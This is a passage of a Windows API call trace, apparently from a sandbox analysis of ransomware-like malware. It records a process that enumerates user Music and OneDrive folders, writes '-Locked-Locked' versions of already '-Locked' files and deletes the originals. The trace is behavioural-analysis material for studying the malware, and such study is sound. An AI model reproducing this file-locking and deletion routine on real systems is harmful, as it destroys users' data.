lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3525f99f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3525f99f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3525f99f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvz2tud.wav-Locked", cAlternateFileName="JVZ2TU~1.WAV")) returned 1 [0307.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.109] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0b8) returned 1 [0307.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c4) returned 1 [0307.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f8) returned 1 [0307.109] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", nBufferLength=0x105, lpBuffer=0x1aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", lpFilePart=0x0) returned 0x2a [0307.109] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\", nBufferLength=0x105, lpBuffer=0x1aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\", lpFilePart=0x0) returned 0x2b [0307.109] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\*", lpFindFileData=0x1aee20 | out: lpFindFileData=0x1aee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x352ebfeb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352ebfeb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x352ebfeb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352ebfeb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351ea686, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x351ea686, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351ea686, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="D3Q e1suI.m4a-Locked", cAlternateFileName="D3QE1S~2.M4A")) returned 1 [0307.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35205459, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35205459, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35205459, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="enT 3CCOSpQ2.mp3-Locked", cAlternateFileName="ENT3CC~2.MP3")) returned 1 [0307.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x352300c1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x352300c1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352300c1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F4vRoPo.wav-Locked", cAlternateFileName="F4VROP~1.WAV")) returned 1 [0307.111] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3525f99f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3525f99f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3525f99f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvz2tud.wav-Locked", cAlternateFileName="JVZ2TU~1.WAV")) returned 1 [0307.111] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3525f99f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3525f99f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3525f99f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvz2tud.wav-Locked", cAlternateFileName="JVZ2TU~1.WAV")) returned 0 [0307.111] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0b8) returned 1 [0307.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c4) returned 1 [0307.111] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked-Locked", lpFilePart=0x0) returned 0x46 [0307.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0307.112] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\d3q e1sui.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.112] GetFileType (hFile=0x49c) returned 0x1 [0307.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0307.112] GetFileType (hFile=0x49c) returned 0x1 [0307.114] CloseHandle (hObject=0x49c) returned 1 [0307.114] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked", lpFilePart=0x0) returned 0x3f [0307.114] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\d3q e1sui.m4a-locked")) returned 1 [0307.115] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked-Locked", lpFilePart=0x0) returned 0x49 [0307.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0307.115] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\ent 3ccospq2.mp3-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.115] GetFileType (hFile=0x49c) returned 0x1 [0307.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0307.115] GetFileType (hFile=0x49c) returned 0x1 [0307.117] CloseHandle (hObject=0x49c) returned 1 [0307.117] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked", lpFilePart=0x0) returned 0x42 [0307.117] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\ent 3ccospq2.mp3-locked")) returned 1 [0307.118] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked-Locked", lpFilePart=0x0) returned 0x44 [0307.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0307.118] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\f4vropo.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.118] GetFileType (hFile=0x49c) returned 0x1 [0307.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0307.119] GetFileType (hFile=0x49c) returned 0x1 [0307.143] CloseHandle (hObject=0x49c) returned 1 [0307.144] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked", lpFilePart=0x0) returned 0x3d [0307.144] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\f4vropo.wav-locked")) returned 1 [0307.144] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked-Locked", lpFilePart=0x0) returned 0x44 [0307.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0307.144] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\jvz2tud.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.145] GetFileType (hFile=0x49c) returned 0x1 [0307.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0307.145] GetFileType (hFile=0x49c) returned 0x1 [0307.147] CloseHandle (hObject=0x49c) returned 1 [0307.147] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked", lpFilePart=0x0) returned 0x3d [0307.147] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\jvz2tud.wav-locked")) returned 1 [0307.148] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", nBufferLength=0x105, lpBuffer=0x1aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", lpFilePart=0x0) returned 0x2a [0307.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d0) returned 1 [0307.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx"), fInfoLevelId=0x0, lpFileInformation=0x1af150 | out: lpFileInformation=0x1af150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x37789b1c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37789b1c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0307.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0cc) returned 1 [0307.148] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx")) returned 0 [0307.149] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0307.149] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0307.150] CoTaskMemFree (pv=0x73f0b8) [0307.151] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", nBufferLength=0x105, lpBuffer=0x1aeccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", lpFilePart=0x0) returned 0x25 [0307.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af118) returned 1 [0307.152] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj"), fInfoLevelId=0x0, lpFileInformation=0x1af198 | out: lpFileInformation=0x1af198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x37726ccf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37726ccf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0307.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af114) returned 1 [0307.152] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj")) returned 0 [0307.152] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0307.152] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0307.153] CoTaskMemFree (pv=0x73f0b8) [0307.154] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", lpFilePart=0x0) returned 0x21 [0307.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0307.154] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x376f7385, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x376f7385, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0307.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0307.155] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai")) returned 0 [0307.155] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0307.155] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0307.155] CoTaskMemFree (pv=0x73f0b8) [0307.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.158] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive", lpFilePart=0x0) returned 0x1e [0307.158] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", lpFilePart=0x0) returned 0x1f [0307.158] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x35369ed2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.158] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x35369ed2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.158] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3535b104, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3535b104, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3535b104, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.159] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.159] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive", lpFilePart=0x0) returned 0x1e [0307.159] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", lpFilePart=0x0) returned 0x1f [0307.160] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x35369ed2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35369ed2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x35369ed2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35369ed2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3535b104, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3535b104, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3535b104, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3535b104, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3535b104, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3535b104, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 0 [0307.161] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.161] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x38 [0307.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.161] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.161] GetFileType (hFile=0x49c) returned 0x1 [0307.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.162] GetFileType (hFile=0x49c) returned 0x1 [0307.163] CloseHandle (hObject=0x49c) returned 1 [0307.164] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked", lpFilePart=0x0) returned 0x31 [0307.164] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini-locked")) returned 1 [0307.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.166] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games", lpFilePart=0x0) returned 0x21 [0307.166] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", lpFilePart=0x0) returned 0x22 [0307.166] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, 